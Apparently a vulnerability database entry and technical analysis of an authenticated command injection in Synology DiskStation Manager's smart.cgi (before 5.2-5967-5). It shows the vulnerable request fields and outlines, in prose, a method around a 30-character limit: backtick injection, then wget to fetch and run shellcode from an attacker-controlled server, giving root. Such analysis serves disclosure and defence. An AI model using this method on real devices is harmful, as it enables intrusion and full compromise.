Attacker Value
Very High


Disclosure Date: December 04, 2017


(1 user assessed) Low
Attack Vector
Privileges Required
User Interaction


Command injection vulnerability in smart.cgi in Synology DiskStation Manager (DSM) before 5.2-5967-5 allows remote authenticated users to execute arbitrary commands via disk field.

Add Assessment

Technical Analysis

AUTHENTICATED command execution in webman/modules/StorageManager/smart.cgi through either a GET or POST request.
Variables for the request look as such:

        'action' => 'apply',
        'operation' => 'quick',
        'disk' => "/dev/sda"

The disk field is vulnerable. However, that’s just where this fun begins. The disk field is required to be ‘semi’ disk correct. AKA you can’t just have nothing there, or a, however /dev/sd did seem to work. Next, when the command is passed off, the entire disk field is limited to 30 characters. After shortening to /dev/sd and then adding ticks (‘`’) you are left with 22 characters. Pretty tight spacing.

To circumvent this restriction, the following was done:

  1. in < 22 characters, echo -n and ip:port to a file (/a).
  2. use wget -i /a -O <file> to then pull back shell code from a attacker controlled HTTP server
  3. execute the payload

Most likely step 1 will need to be done in > 1 steps.

Exploitation grants root privileges.

General Information

Additional Info

Technical Analysis